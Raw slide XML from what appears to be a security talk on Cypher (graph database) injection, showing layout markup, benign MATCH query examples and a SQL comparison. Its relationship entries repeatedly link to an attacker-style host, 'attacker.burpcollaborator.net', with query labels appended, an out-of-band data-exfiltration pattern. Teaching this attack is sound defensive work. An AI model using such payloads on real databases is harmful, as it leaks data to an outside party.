        <p:grpSpPr>
          <a:xfrm flipH="1">
            <a:off x="5287722" y="1942450"/>
            <a:ext cx="3853412" cy="3206994"/>
            <a:chOff x="-13316" y="1942450"/>
            <a:chExt cx="3853412" cy="3206994"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="799" name="Google Shape;799;p8"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm flipH="1" rot="-5400000">
              <a:off x="-784725" y="2727175"/>
              <a:ext cx="3189300" cy="1619850"/>
              <a:chOff x="4185675" y="845125"/>
              <a:chExt cx="3189300" cy="1619850"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="800" name="Google Shape;800;p8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3" name="Google Shape;803;p8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8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5" name="Google Shape;805;p8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806" name="Google Shape;806;p8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1" name="Google Shape;811;p8"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5158098" y="1231184"/>
            <a:ext cx="3985907" cy="3918269"/>
            <a:chOff x="2524675" y="238075"/>
            <a:chExt cx="1178600" cy="1158600"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="812" name="Google Shape;812;p8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8"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-26" y="2571758"/>
            <a:ext cx="3840097" cy="2558635"/>
            <a:chOff x="235225" y="2771600"/>
            <a:chExt cx="3133750" cy="2088000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="867" name="Google Shape;867;p8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2" name="Google Shape;872;p8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873" name="Google Shape;873;p8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8" name="Google Shape;87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"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1033100" y="1803419"/>
            <a:ext cx="3310200" cy="4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1" name="Google Shape;881;p9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1207550" y="2281594"/>
            <a:ext cx="3135900" cy="10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882" name="Google Shape;882;p9"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-13316" y="3126092"/>
            <a:ext cx="3025768" cy="2023351"/>
            <a:chOff x="-13316" y="3126092"/>
            <a:chExt cx="3025768" cy="2023351"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="883" name="Google Shape;883;p9"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1" rot="10800000">
              <a:off x="-13316" y="3126092"/>
              <a:ext cx="3025768" cy="2023351"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="16935" w="25325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 rot="10800000">
              <a:off x="-13308" y="4132062"/>
              <a:ext cx="2619371" cy="1017382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9"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="5898126" y="-3"/>
            <a:ext cx="3245882" cy="2349753"/>
            <a:chOff x="5905501" y="2793747"/>
            <a:chExt cx="3245882" cy="2349753"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="886" name="Google Shape;886;p9"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5905501" y="2793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7545725" y="4003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9"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="39701" y="-10"/>
            <a:ext cx="3277907" cy="1263055"/>
            <a:chOff x="1766764" y="-4125385"/>
            <a:chExt cx="3277907" cy="1263055"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="889" name="Google Shape;889;p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5" name="Google Shape;915;p9"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="-5400000">
            <a:off x="6873526" y="1007415"/>
            <a:ext cx="3277907" cy="1263055"/>
            <a:chOff x="1766764" y="-4125385"/>
            <a:chExt cx="3277907" cy="1263055"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="916" name="Google Shape;916;p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2" name="Google Shape;942;p9"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5866101" y="3880440"/>
            <a:ext cx="3277907" cy="1263055"/>
            <a:chOff x="1766764" y="-4125385"/>
            <a:chExt cx="3277907" cy="1263055"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="943" name="Google Shape;943;p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9" name="Google Shape;969;p9"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm flipH="1">
            <a:off x="-7924" y="3880440"/>
            <a:ext cx="3277907" cy="1263055"/>
            <a:chOff x="1766764" y="-4125385"/>
            <a:chExt cx="3277907" cy="1263055"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="970" name="Google Shape;970;p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6" name="Google Shape;99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"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4617350" y="397325"/>
            <a:ext cx="38133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99" name="Google Shape;999;p10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000" name="Google Shape;1000;p10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0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0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0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0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0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0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0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0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0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0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0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0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0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0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0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0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0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0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0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0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0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0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0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0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0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0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0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0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0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0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0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0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0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0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0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0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0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0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0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0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0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0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0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0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0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0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0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0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0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0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0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0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0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10"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5158098" y="1225234"/>
            <a:ext cx="3985907" cy="3918269"/>
            <a:chOff x="2524675" y="238075"/>
            <a:chExt cx="1178600" cy="1158600"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1055" name="Google Shape;1055;p10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0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0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0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0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0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0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0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0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0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0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0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0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0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0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0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0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0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0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0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0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0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0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0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0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0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0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0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0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0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0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0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0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0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0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0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0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0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0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0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0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0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0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0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0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0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0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0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0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0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0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0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0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0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9" name="Google Shape;110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Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image18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Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image13.png"/><Relationship Id="rId10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Relationship Id="rId7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ttacker.burpcollaborator.net/'+label" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attacker.burpcollaborator.net/'+label" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attacker.burpcollaborator.net/'+label" TargetMode="External"/><Relationship Id="rId6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ttacker.burpcollaborator.net/'+label" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attacker.burpcollaborator.net/'+label" TargetMode="External"/><Relationship Id="rId5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ttacker.burpcollaborator.net/'+label" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attacker.burpcollaborator.net/'+label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51.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image70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63.png"/><Relationship Id="rId8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5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image63.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image48.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image70.png"/><Relationship Id="rId8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Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image75.png"/><Relationship Id="rId5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4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redis.io/docs/stack/graph/cypher_support/#parameters" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://redis.io/commands/graph.query/#procedures" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://redis.io/docs/stack/graph/cypher_support/#string-functions" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image72.png"/><Relationship Id="rId7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github.com/noypearl/cypher-playground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9.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image71.png"/><Relationship Id="rId5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sidechannel.blog/en/the-cypher-injection-saga/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/morkin1792/CIWA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1.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image73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7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4.png"/><Relationship Id="rId10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31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1304650" y="1145975"/>
            <a:ext cx="636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31"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1283125" y="2012150"/>
            <a:ext cx="6906300" cy="169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The New “SQL Injection”</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="3700"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="3700"/>
              <a:t>We Aren’t Aware Of</a:t>
            </a:r>
            <a:endParaRPr sz="3700"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3126" name="Google Shape;3126;p31"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="69350" y="4560300"/>
            <a:ext cx="25218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Noy Pearl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7" name="Google Shape;3127;p31"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="736650" y="1167525"/>
            <a:ext cx="7670700" cy="10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Cypher Injection</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3128" name="Google Shape;3128;p31"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="47696" r="0" t="4725"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7569650" y="3248225"/>
            <a:ext cx="1269725" cy="1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9" name="Google Shape;3129;p31"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="55293" t="9535"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="128575" y="2176787"/>
            <a:ext cx="1085300" cy="16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0" name="Google Shape;313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1" name="Google Shape;31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8200" y="76275"/>
            <a:ext cx="1269724" cy="1266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2" name="Google Shape;3252;p40"/>
          <p:cNvPicPr preferRelativeResize="0"/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196100" y="200000"/>
            <a:ext cx="864611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3" name="Google Shape;3253;p40"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4296425" y="689875"/>
            <a:ext cx="951900" cy="951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40"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7147200" y="257200"/>
            <a:ext cx="951900" cy="951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40"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7775950" y="1951325"/>
            <a:ext cx="951900" cy="951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6" name="Google Shape;32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025" y="1641775"/>
            <a:ext cx="1029100" cy="10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7" name="Google Shape;32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26" y="3601046"/>
            <a:ext cx="951900" cy="95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8" name="Google Shape;325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8025" y="200000"/>
            <a:ext cx="984950" cy="9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9" name="Google Shape;3259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2475" y="4010400"/>
            <a:ext cx="951900" cy="9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0" name="Google Shape;3260;p40"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId8">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="5489" l="18740" r="17078" t="22094"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7775950" y="1986987"/>
            <a:ext cx="951900" cy="88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1" name="Google Shape;326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7200" y="281350"/>
            <a:ext cx="951900" cy="90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2" name="Google Shape;3262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31375" y="735175"/>
            <a:ext cx="916800" cy="88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3" name="Google Shape;3263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79775" y="1531350"/>
            <a:ext cx="1174476" cy="1174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4" name="Google Shape;326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8" name="Shape 3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9" name="Google Shape;3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9" cy="23137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0" name="Google Shape;3270;p41"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="8366"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5729150" y="2829725"/>
            <a:ext cx="3414849" cy="23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1" name="Google Shape;327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5" name="Shape 3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" name="Google Shape;3276;p42"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1308600" y="3889575"/>
            <a:ext cx="6363900" cy="68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42"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-92475" y="3720075"/>
            <a:ext cx="9144000" cy="14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MATCH</a:t>
            </a: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 (c:Character {name:"</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="31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Spongebob</a:t>
            </a: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"}) </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="31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8" name="Google Shape;3278;p42"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="637475" y="219700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Terms</a:t>
            </a:r>
            <a:endParaRPr sz="3800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3279" name="Google Shape;3279;p42"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="5" type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2034100" y="805250"/>
            <a:ext cx="13374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Node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3280" name="Google Shape;3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175" y="1358425"/>
            <a:ext cx="6323024" cy="18310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81" name="Google Shape;3281;p42"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2702800" y="1187625"/>
            <a:ext cx="0" cy="3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2" name="Google Shape;3282;p42"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="5" type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3099605" y="805270"/>
            <a:ext cx="27819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Relationship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283" name="Google Shape;3283;p42"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4490550" y="1222575"/>
            <a:ext cx="0" cy="95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4" name="Google Shape;3284;p42"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="5" type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5785436" y="805250"/>
            <a:ext cx="13374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Node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285" name="Google Shape;3285;p42"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6454125" y="1222575"/>
            <a:ext cx="0" cy="48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6" name="Google Shape;3286;p42"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="5" type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1043500" y="3472250"/>
            <a:ext cx="19707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Variable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287" name="Google Shape;3287;p42"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2137000" y="3887925"/>
            <a:ext cx="0" cy="17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8" name="Google Shape;3288;p42"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="5" type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2413805" y="3472270"/>
            <a:ext cx="27819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Label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289" name="Google Shape;3289;p42"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3804750" y="3889575"/>
            <a:ext cx="0" cy="17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0" name="Google Shape;3290;p42"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="5" type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4566221" y="3472250"/>
            <a:ext cx="1808700" cy="39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Property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291" name="Google Shape;3291;p42"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5234925" y="3889575"/>
            <a:ext cx="0" cy="19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2" name="Google Shape;329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43"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="386300" y="1129825"/>
            <a:ext cx="7801800" cy="2796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43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Goodbye </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SELECT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>, Hello </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MATCH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99" name="Google Shape;3299;p43"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4294967295" type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="441575" y="973488"/>
            <a:ext cx="8527800" cy="141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/>
              <a:t>Get all Characters:  </a:t>
            </a:r>
            <a:endParaRPr sz="2600" u="sng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121"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MATCH</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2600"/>
              <a:t> (c:Character) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2600">
                <a:solidFill>
                  <a:srgbClr val="212121"/>
                </a:solidFill>
              </a:rPr>
              <a:t>RETURN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2600"/>
              <a:t> c</a:t>
            </a:r>
            <a:endParaRPr sz="2600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3300" name="Google Shape;3300;p43"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="4223" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6256050" y="2811900"/>
            <a:ext cx="2931626" cy="23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1" name="Google Shape;3301;p43"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="441575" y="2312800"/>
            <a:ext cx="9101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Character by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2600" u="sng">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="6AA84F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name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2600" u="sng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endParaRPr sz="2600" u="sng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lang="en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(c:Character) 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lang="en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c.name = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="6AA84F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‘Spongebob’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en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lang="en" sz="26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c</a:t>
            </a:r>
            <a:endParaRPr sz="26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02" name="Google Shape;330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44"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3755350" y="903250"/>
            <a:ext cx="4801500" cy="2316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44"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2871200" y="1510750"/>
            <a:ext cx="6325200" cy="12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Injection </a:t>
            </a:r>
            <a:endParaRPr sz="7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Time!</a:t>
            </a:r>
            <a:endParaRPr sz="7400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3309" name="Google Shape;3309;p44"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="5473"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-663675" y="1510750"/>
            <a:ext cx="4906175" cy="36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0" name="Google Shape;331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4" name="Shape 3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5" name="Google Shape;3315;p45"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1626901" y="2966600"/>
            <a:ext cx="5890200" cy="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155CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>In A Nutshell</a:t>
            </a:r>
            <a:endParaRPr sz="4800">
              <a:solidFill>
                <a:srgbClr val="1155CC"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3316" name="Google Shape;3316;p45"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="720000" y="2062150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SQL Injection</a:t>
            </a:r>
            <a:endParaRPr sz="7200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3317" name="Google Shape;331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1" name="Shape 3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2" name="Google Shape;3322;p46"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="433525" y="876500"/>
            <a:ext cx="8497800" cy="186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46"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3500" y="854225"/>
            <a:ext cx="95448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SELECT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lang="en" sz="25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FROM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“characters” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="25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name = “</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="22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Spongebob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/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3324" name="Google Shape;3324;p46"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="720000" y="2371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 In A Nutshell</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3325" name="Google Shape;3325;p46"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3270600" y="2858950"/>
            <a:ext cx="478500" cy="2033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3326" name="Google Shape;3326;p46"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3270600" y="2858950"/>
            <a:ext cx="478500" cy="424200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="5F819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id</a:t>
            </a:r>
            <a:endParaRPr b="1" i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327" name="Google Shape;3327;p46"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3270600" y="3261236"/>
            <a:ext cx="4785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0</a:t>
            </a:r>
            <a:endParaRPr b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328" name="Google Shape;3328;p46"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3270600" y="3663521"/>
            <a:ext cx="4785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1</a:t>
            </a:r>
            <a:endParaRPr b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329" name="Google Shape;3329;p46"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3270600" y="4065807"/>
            <a:ext cx="4785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2</a:t>
            </a:r>
            <a:endParaRPr b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330" name="Google Shape;3330;p46"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3270600" y="4468100"/>
            <a:ext cx="4785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3</a:t>
            </a:r>
            <a:endParaRPr b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331" name="Google Shape;3331;p46"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3740502" y="2858950"/>
            <a:ext cx="1610100" cy="2033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3332" name="Google Shape;3332;p46"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3740502" y="2858950"/>
            <a:ext cx="1610100" cy="424200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="5F819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name</a:t>
            </a:r>
            <a:endParaRPr b="1" i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333" name="Google Shape;3333;p46"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3740502" y="3261234"/>
            <a:ext cx="16101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Spongebob</a:t>
            </a:r>
            <a:endParaRPr b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334" name="Google Shape;3334;p46"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3740502" y="3663519"/>
            <a:ext cx="16101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Patrick</a:t>
            </a:r>
            <a:endParaRPr b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335" name="Google Shape;3335;p46"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3740502" y="4459319"/>
            <a:ext cx="16101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Squidward</a:t>
            </a:r>
            <a:endParaRPr b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336" name="Google Shape;3336;p46"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3740502" y="4065803"/>
            <a:ext cx="16101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Sandy</a:t>
            </a:r>
            <a:endParaRPr b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337" name="Google Shape;3337;p46"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
